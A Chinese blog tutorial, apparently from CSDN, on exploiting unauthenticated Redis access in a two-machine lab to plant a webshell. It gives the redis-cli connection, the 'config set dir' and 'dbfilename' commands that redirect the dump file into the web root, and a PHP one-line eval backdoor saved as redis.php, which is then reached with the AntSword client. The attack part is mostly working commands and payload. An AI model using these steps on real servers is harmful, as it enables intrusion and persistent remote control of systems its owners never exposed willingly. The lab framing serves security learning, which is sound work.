Redis未授权访问漏洞(二)Webshell提权篇

前言

在学习这篇文章之前,请先通过这篇文章Redis未授权访问漏洞(一)先导篇学习一下基础知识,再来学习这篇文章。

webshell提权

环境准备

攻击机: Centos7 IP:192.168.44.130
靶机:Centos7 IP:192.168.44.129

首先我们需要准备好两台安装Redis服务的机器,安装步骤可以参考先导篇的内容进行安装,然后在靶机上安装phpstudy开启Web服务为我们的Webshell提权提供基础环境。

在这里插入图片描述yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh && sh install.sh

Centos7中安装phpstudy直接执行这条命令即可

phpstudy -start

开启小皮面板

在这里插入图片描述
实战实验

步骤一:通过前期的信息收集,确定Web服务器开放80端口,然后攻击机连接Web服务器开放的6379端口

我们通过攻击机启动Redis客户端去远程连接靶机的6379端口,模仿黑客通过公网的6379端口入侵企业的Web服务器

redis-cli -h 192.168.44.129 -p 6379

在这里插入图片描述连接成功

步骤二:通过各种方法找出网站的根目录

然后我们在通过浏览器去访问靶机的Web服务:
在这里插入图片描述可以看到这里的根目录已经暴露出来了,实战中我们这一步就是要通过各种办法找到网站的根目录

步骤三:修改网站的动态配置,将网站的保存文件路劲修改为网站的根路劲,文件名可以随便写

config set dir /www/admin/localhost_80/wwwroot
config set dbfilename redis.php

步骤四:往数据库中写入一句话木马,然后保存

set x "<?php @eval($_POST[wuya]); ?>"
save

步骤五:通过浏览器确定文件是否写入成功,同时也确定文件路劲:

在这里插入图片描述
步骤六:通过中国蚁剑连接

在这里插入图片描述
在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值